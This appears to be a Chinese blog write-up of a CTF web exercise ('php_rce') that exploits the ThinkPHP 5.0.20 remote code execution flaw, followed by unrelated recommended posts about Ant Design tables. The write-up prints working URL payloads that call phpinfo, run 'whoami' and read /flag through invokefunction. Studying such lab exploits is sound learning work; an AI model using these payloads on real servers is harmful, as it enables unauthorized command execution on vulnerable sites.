攻防世界web练习15

最新推荐文章于 2025-09-26 03:02:56 发布
原创 最新推荐文章于 2025-09-26 03:02:56 发布 · 494 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #php #安全 #web安全

本文详细介绍了攻防世界web练习中的php_rce问题,涉及ThinkPHP5框架的一个远程代码执行漏洞。通过特定的URL输入,可以执行phpinfo及系统命令,如whoami,揭示了ThinkPHP5.0.20版本存在的getshell风险。利用此漏洞,可以尝试获取服务器flag。

攻防世界web练习

十五、php_rce

http://111.200.241.244:59735/
ThinkPHP远程代码执行

这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:
输入:http://your-ip:8080/index.php

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

可执行phpinfo:

可以执行phpinfo,那可不可以执行其他命令呢?查了一下网上的payload,如下:

输入:http://your-ip:8080/index.php

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

返回看到:www-data www-data

【原理】

ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。

  1. http://111.200.241.244:59735/index.php
    ?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
    截图截图
    发现网页使用的是ThinkPHP框架,版本为5.0.20,此版本存在getshell漏洞(百度一下poc一抓一大把)

    1. 查找flag:http://111.200.241.244:59735/index.php
      ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
      截图
H_S2022
关注
树形选择变成表格树选择
qq_42173653的博客
01-29 1581
需求:在接口不改动的情况下由树形结构改成表格树结构,如下图 原图 调整后 1.这里使用的是antdesign框架,首先将a-tree改为a-table <!-- <a-tree checkable v-model="checkedKeys" :treeData="menuTree" @check="checkItem"></a-tree> --> <a-table :columns="columns" :data-source="data" :pagi
AntDesign的Table组件(树形数据)添加Checkbox(NG-ZORRO)
@不喝海之言@
11-09 2024
AntDesign的Table组件(树形数据)添加Checkbox(NG-ZORRO)
react-antd table树形数据默认展开行实现jsx文件
12-18
react-antd table树形数据默认展开行实现jsx文件
Ant Design表单多选框组:Checkbox.Group与批量选择
gitblog_00560的博客
09-26 662
在企业级应用开发中,表单数据录入是核心功能之一。当需要用户从多个选项中选择多项时,Ant Design的Checkbox.Group组件提供了高效解决方案。本文将从基础用法到高级场景,全面解析Checkbox.Group的使用技巧与批量选择实现方案,帮助开发者快速掌握这一组件的实战应用。 ## 组件概述与核心优势 Checkbox.Group是Ant Design提供的多选框组组件,位于[co...
checkbox tree 带checkbox的树
04-01
checkbox的树 checkbox tree tree tree checkbox
树形复选框(Checkbox)
02-13
用javascript+css实现树形复选框(Checkbox),可显示选中数和有展缩功能.
antd + vue】a-table 树形数据展示 - 嵌套子表格
m0_65041204的博客
03-09 4801
Ant Design Vue 组件 a-table 嵌套表格时,父表格展开后,子表格数据渲染了2次
Element-ui树形控件el-tree自定义增删改和局部刷新及懒加载操作
11-19
需求: vue-cli项目树形控件:一级节点为本地节点,默认展开一级节点,增删改后局部刷新数据。 增加节点,点击确定后局部刷新,渲染新数据。 源码 element组件样式 <el-tree class="treeitems" :data="data...
ant的 Table实现树形数据的子数据勾选框不展示
最新发布
11-26
我们正在使用Ant Design的Table组件展示树形数据时,发现子数据的勾选框不显示。根据引用[2]的描述,树形结构在父子关联的情况下,通常子节点的勾选框会显示,但可能因为某些配置问题导致不显示。另外,引用[3]提到...
react 树形表格合并,基于hooks
qq_42957120的博客
12-13 942
react 树形表格合并,基于hooks
antd table 树形数据展示 搜索子数据 展开父节点并高亮搜索出来的数据
1234
02-07 1464
【代码】antd table 树形数据展示 搜索子数据 展开父节点并高亮搜索出来的数据
react-antd-treetable:Ant基于Antd二次开发的树状表格组件,支持懒加载,分页,过滤等功能
03-08
欢迎来到react-antd-treetable :waving_hand: 介绍 基于antd表组件封装,比较适合用于展示的信息。 主要扩展的能力: 层级缩进指示线 远程懒加载子例程 子公告分页 子例程筛选 子每秒空提示 这些功能全部通过插件实现,其他的props全部继承自Ant Design的Table组件。 用法 需要依赖antd , @ant-design/icons npm i react-antd-treetable -S 最简单的用法和antd的表组件完全一致,数据中带有children分割即可: import React from 'react' ; import TreeTable from 'react-antd-treetable' ; const data = [ { name : 'foo' , children : [ { name
tablecheckbox取值
03-19
NULL 博文链接:https://bestwinner.iteye.com/blog/714810
antd table 树形数据列表展示
斌儿的博客
10-23 6455
项目要求列表需要数据能展开,所以用到antd树形数据展示 效果展示 部分代码 <Table columns={this.columns} rowSelection={{ checkStrictly: false,type:radio }} dataSource={dataSource} rowKey="id" /> //checkStrictlyfalse就是选择子级的时候不会把父级一起选中,默认是true //rowKey表格行 key 的取值,如果不设置可能会选中.
Antd - Table 父子表格Checkbox联动
Zong_0915的博客
08-03 710
由于Antd中的父子组件之间,如果有多选功能,那么不会有联动的关系,需要自己实现
antd checkbox 默认选中_Ant design vue table 单击行选中 勾选checkbox教程
weixin_39726379的博客
12-21 6262
最近了解Ant design 设计table 单击行选中checkedbox功能,相比于element的 @row-click 再触发toggleRowSelection,ant design的api就没那么清晰了,言归正传期望:Ant design table 单击行选中 勾选checkedbox实现:单选:onClickRow(record) {return {on: {click: () =...
antd表格树形数据展示的问题
sky1679的博客
11-27 4641
这是场景,能明显看到2018/12/31是偏下的。 我一开始以为是因为td没有设置垂直居中。但是并没有用。 后面发现有个这么个东西 他是有一定宽度的,所以如果你列宽度设置少了,就会把文字挤到下一行。 把列宽度设置大一点即可解决 ...
react + antd table 实现固定三级树结构合并单元格展示
weixin_53363875的博客
07-09 530
react + antd table 实现单元格合并
Ant Design Vue 表格数据按树型展示
Gblfy_Blog
04-19 2578
/** * 使用递归将数组转为树形结构 * 父ID属性为parent */ public static array2Tree (array: any, parentId: number) { if (Tool.isEmpty(array)) { return []; } const result = []; for (let i = 0; i < array.length; i++) { const c = array[i
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值